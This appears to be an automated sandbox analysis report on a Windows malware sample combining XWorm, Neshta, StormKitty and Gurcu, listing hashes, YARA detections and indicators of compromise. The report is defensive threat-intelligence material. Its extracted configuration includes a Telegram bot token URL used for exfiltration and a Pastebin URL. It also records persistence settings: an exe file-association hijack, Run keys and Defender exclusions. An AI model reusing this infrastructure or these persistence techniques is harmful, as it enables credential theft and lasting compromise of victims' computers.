gurcu | 48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 20:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Size

929KB
MD5

8eb0e52dfb39029f6e6faf24da745154
SHA1

5ca96e568691238f92fcfc233869797c70928fd1
SHA256

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89
SHA512

3f55dc3a9212906713f4e28fceca2a23e471a963c958547c641207081cc8693ae29007bcb6168f4a3d446e06bbc654145623230876957d763b1cb25aaa683f09
SSDEEP

12288:+m7ZXRcg9nzqKpQDGufOG9FWpJcufIjfg5TOBLLrLwCuQbNLySp3gPJhwFMU:+IZh7nzFVufOVJcuJOBL/RJya38vU

Score

10^/10

gurcu neshta stormkitty xworm credential_access discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/qNxmZ4py
telegram
https://api.telegram.org/bot7178742128:AAEXQUhBJYl0OKqOJRwoAc2oyiBR9_StN1c/sendMessage?chat_id=5605545798

Extracted

Family

gurcu

https://api.telegram.org/bot7178742128:AAEXQUhBJYl0OKqOJRwoAc2oyiBR9_StN1c/sendMessage?chat_id=5605545798

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/5096-618-0x000000001E990000-0x000000001E99E000-memory.dmp	disable_win_def

Detect Neshta payload 64 IoCs

Processes:

resource	yara_rule
C:\Windows\svchost.com	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\JAVAPA~1\javaws.exe	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~4.EXE	family_neshta
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	family_neshta
C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	family_neshta
C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13195~1.15\MICROS~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MI9C33~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~2.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~3.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MI391D~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	family_neshta
C:\Users\ALLUSE~1\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\VC_RED~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{61087~1\VCREDI~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{D87AE~1\WINDOW~1.EXE	family_neshta
behavioral2/memory/4972-239-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2932-241-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/968-242-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/504-249-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/4832-258-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/5008-269-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/4856-270-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/224-276-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/4388-282-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2164-284-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2508-290-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/3748-298-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1676-304-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1612-313-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2404-364-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1128-458-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/3396-480-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/3396-594-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1128-592-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/5448-595-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2404-601-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/5196-607-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/3396-704-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1128-703-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect Xworm Payload 10 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Hiplace.exe	family_xworm
C:\Users\Admin\AppData\Roaming\svchost.exe	family_xworm
C:\Users\Admin\AppData\Roaming\explorer.exe	family_xworm
behavioral2/memory/5096-78-0x0000000000AE0000-0x0000000000AF8000-memory.dmp	family_xworm
behavioral2/memory/2368-88-0x0000000000900000-0x000000000091A000-memory.dmp	family_xworm
behavioral2/memory/1480-86-0x0000000000D50000-0x0000000000D6C000-memory.dmp	family_xworm
behavioral2/memory/4440-459-0x000002ADB4930000-0x000002ADB497C000-memory.dmp	family_xworm
behavioral2/memory/4440-462-0x000002ADB4980000-0x000002ADB499A000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_xworm
behavioral2/memory/5496-505-0x00000000001B0000-0x00000000001C8000-memory.dmp	family_xworm

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5096-637-0x000000001F300000-0x000000001F420000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5088	powershell.exe
1440	powershell.exe
4968	powershell.exe
3668	powershell.exe
5424	powershell.exe
4308	powershell.exe
5084	powershell.exe
1312	powershell.exe
3572	powershell.exe
716	powershell.exe
1204	powershell.exe
5144	powershell.exe
4440	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorer.exeHiplace.exesvchost.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	explorer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Hiplace.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 4 IoCs

Processes:

svchost.exeexplorer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk	explorer.exe

Executes dropped EXE 29 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.comHiplace.exeexplorer.exesvchost.comsvchost.exePORSCH~1.EXEsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.exesvchost.comsvchost.comsvchost.exeexplorer.exesvchost.exeexplorer.exe

pid	process
1848	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
968	svchost.com
2932	svchost.com
4972	svchost.com
2368	Hiplace.exe
1480	explorer.exe
3396	svchost.com
5096	svchost.exe
2620	PORSCH~1.EXE
504	svchost.com
4832	svchost.com
5008	svchost.com
4856	svchost.com
224	svchost.com
4388	svchost.com
2164	svchost.com
3748	svchost.com
2508	svchost.com
1676	svchost.com
1612	svchost.com
2404	svchost.com
5448	svchost.com
5496	svchost.exe
2404	svchost.com
5196	svchost.com
1972	svchost.exe
4824	explorer.exe
1496	svchost.exe
6064	explorer.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exeexplorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Local\\Temp\\explorer.exe"	explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

25 pastebin.com
1 pastebin.com
2 pastebin.com
5 pastebin.com
6 pastebin.com

flow	ioc
25	pastebin.com
1	pastebin.com
2	pastebin.com
5	pastebin.com
6	pastebin.com

Drops file in Program Files directory 64 IoCs

Processes:

48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.com

description	ioc	process
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~4.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MI9C33~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~3.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13195~1.15\MICROS~2.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	svchost.com

Drops file in Windows directory 39 IoCs

Processes:

svchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

svchost.comsvchost.compowershell.exe48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exesvchost.comsvchost.comsvchost.compowershell.exesvchost.comsvchost.comsvchost.comsvchost.compowershell.exesvchost.comsvchost.compowershell.exesvchost.compowershell.exesvchost.compowershell.exesvchost.comsvchost.compowershell.exepowershell.exesvchost.compowershell.exeschtasks.exesvchost.comsvchost.compowershell.exepowershell.exesvchost.compowershell.exeschtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	48dcfdc11bac87a30fced1f62b8ef94c31b3ba364e2d0e051f02ff5bc1c2fd89.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
